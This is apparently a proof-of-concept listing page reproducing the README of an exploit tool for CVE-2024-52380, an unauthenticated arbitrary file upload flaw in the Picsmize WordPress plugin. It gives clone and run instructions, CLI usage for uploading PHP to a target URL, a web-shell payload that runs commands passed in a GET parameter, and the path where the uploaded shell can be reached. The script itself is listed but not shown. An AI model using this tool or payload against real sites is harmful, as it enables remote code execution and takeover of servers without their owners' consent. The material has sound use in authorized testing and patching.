CVE-2024-52380 PoC — WordPress Picsmize plugin <= 1.0.0 - Arbitrary File Upload vulnerability

Source

Associated Vulnerability

Description

Picsmize plugin for WordPress is vulnerable to arbitrary file uploads.

Readme

# CVE-2024-52380-Exploit
Picsmize plugin for WordPress is vulnerable to arbitrary file uploads.
# Description
This script exploits a vulnerability (CVE-2024-52380) in the **Picsmize plugin** for WordPress, allowing unauthenticated attackers to perform arbitrary file uploads. This vulnerability exists in all versions of Picsmize up to and including **1.0.0**. Exploiting this vulnerability may result in remote code execution on the target server.

## 🌟 Features
- **Check Plugin Version**: Automatically verifies if the target WordPress site is using a vulnerable version of the Picsmize plugin.
- **File Upload Exploit**: Upload arbitrary PHP payloads to the target server if the site is vulnerable.
- **Command Line Interface**: Easy-to-use CLI for specifying target URLs and payloads.

## 📖 Vulnerability Details
- **Plugin Name**: Picsmize
- **Affected Versions**: All versions ≤ 1.0.0
- **Vulnerability Type**: Unauthenticated Arbitrary File Upload
- **CVE ID**: CVE-2024-52380

## 🚀 Usage Instructions

### Prerequisites
- Python 3.7 or higher
- `requests` library (`pip install requests`)

### Running the Script

1. Clone the repository:
   ```bash
   git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
   cd CVE-2024-52380-Exploit


### Usage -help:
```
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]

Check plugin version and upload a PHP file to a WordPress site.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site (e.g., http://192.168.100.74:888).
  -c CONTENT, --content CONTENT
                        Content of the PHP file to be uploaded.
```
### Example
```
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
```
### Command-Line Arguments

The script provides two command-line arguments for ease of use:

1. **`-u` / `--url` (required)**:
   - **Purpose**: Specifies the base URL of the target WordPress site.
   - **Example**:
     ```bash
     -u http://example.com
     ```

2. **`-c` / `--content` (optional)**:
   - **Purpose**: Sets the PHP payload content to be uploaded.
   - **Default Value**: 
     ```php
     <?php phpinfo(); ?>
     ```
   - **Example**:
     ```bash
     -c "<?php system($_GET['cmd']); ?>"
     ```
### 📂 File Upload Path
#### Explanation:
- **`/wordpress`**: Root directory of the WordPress site.
- **`wp-content/uploads`**: Default directory for media uploads in WordPress.
- **`2025/01`**: The directory structure corresponds to the year (2025) and month (January) based on the server's date configuration.

#### How to Access the Uploaded File:
1. After a successful upload, navigate to the file using the full URL.
   Example:

http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php
        
### ⚠️ Disclaimer
This script is intended for educational purposes and authorized security testing only. Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal and unethical.

File Snapshot

 [4.0K]  /data/pocs/fa9e3abb178102a1edf2552087c3d9b760b8946c
├── [3.8K]  CVE-2024-52380.py
└── [3.0K]  README.md

0 directories, 2 files

Remarks